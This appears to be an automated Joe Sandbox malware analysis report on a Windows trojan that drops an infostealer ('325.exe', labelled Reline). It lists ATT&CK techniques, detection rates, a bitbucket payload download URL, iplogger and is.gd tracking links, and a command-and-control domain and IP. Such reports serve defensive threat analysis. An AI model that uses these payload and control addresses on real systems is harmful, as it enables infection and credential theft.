Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery451	SSH	Clipboard Data2	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion231	Cached Domain Credentials	Process Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion231	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kS2dqbsDwD.exe	20%	Virustotal		Browse
kS2dqbsDwD.exe	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\325.exe	33%	ReversingLabs	ByteCode-MSIL.Infostealer.Reline

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.1.kS2dqbsDwD.exe.140000000.0.unpack	100%	Avira	HEUR/AGEN.1142275		Download File
14.2.325.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140572		Download File

Domains

Source	Detection	Scanner	Label	Link
yspasenana.xyz	1%	Virustotal		Browse
api.ip.sb	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://ahkscript.org	1%	Virustotal		Browse
http://ahkscript.org	0%	Avira URL Cloud	safe
http://yspasenana.xyz/	1%	Virustotal		Browse
http://yspasenana.xyz/	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
http://yspasenana.xyz4	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://yspasenana.xyz:80/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://yspasenana.xyz	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnviron	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://go.micros	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
https://d301sr5gafysq2.cloudfront.net;	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-w.us-east-1.amazonaws.com	52.217.201.169	true	false		high
yspasenana.xyz	212.224.105.105	true	true	1%, Virustotal, Browse	unknown
bitbucket.org	104.192.141.1	true	false		high
iplogger.org	88.99.66.31	true	false		high
is.gd	104.25.234.53	true	false		high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false		high
api.ip.sb	unknown	unknown	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://yspasenana.xyz/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	false		high
http://service.r	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	false		high
https://is.gd/	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
http://ahkscript.org	kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website;	kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	false		high
https://api.ip.sb/geoip	325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://yspasenana.xyz4	325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/D	325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	false		high
http://tempuri.org/	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://ns.adobe.c/g	325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://yspasenana.xyz:80/	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://is.gd/b	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_real	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://is.gd/nKi5S3H	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
https://iplogger.org/y	kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_pdf	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-	kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://support.a	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://yspasenana.xyz	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org/	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://ns.adobe.cobj	325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bitbucket.org/luisadoma999/admin/downloads/325.exe	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	kS2dqbsDwD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bitbucket.org/luisadoma999/admin/downloads/325.exelq	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/SetEnviron	325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://forms.rea	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Spbs7%A_AppData%	kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp	false		high
https://is.gd/nKi5S3$	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false		high
https://aui-cdn.atlassian.com	kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	false		high
https://is.gd/nKi5S3%A_AppData%	kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	kS2dqbsDwD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/answer/6258784	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://www.tiro.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://iplogger.org/	kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	kS2dqbsDwD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_java	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://d301sr5gafysq2.cloudfront.net;	kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.orgcookies//settinString.Removeg	325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0C	kS2dqbsDwD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0D	kS2dqbsDwD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://is.gd/nKi5S3	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false		high
http://tempuri.org/0	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bbuseruploads.s3.amazonaws.com/is.gd	kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	false		high
https://iplogger.org/1Spbs7e	kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0	kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	false		high
https://api.ip.sb	325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://helpx.ad	325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr	false		high
http://ahkscript.orgCould	kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
212.224.105.105	yspasenana.xyz	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
104.25.234.53	is.gd	United States	13335	CLOUDFLARENETUS	false
88.99.66.31	iplogger.org	Germany	24940	HETZNER-ASDE	false
52.217.201.169	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452457
Start date:	22.07.2021
Start time:	11:42:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kS2dqbsDwD (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/29@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 2% (good quality ratio 0.9%) Quality average: 31.8% Quality standard deviation: 39.8%
HCA Information:	Successful, ratio: 83% Number of executed functions: 46 Number of non-executed functions: 214
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.193.48, 13.64.90.137, 20.82.210.154, 23.211.4.86, 52.255.188.83, 40.112.88.60, 13.88.21.125, 20.82.209.183, 80.67.82.235, 80.67.82.211, 104.26.12.31, 104.26.13.31, 172.67.75.172, 20.49.157.6 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, 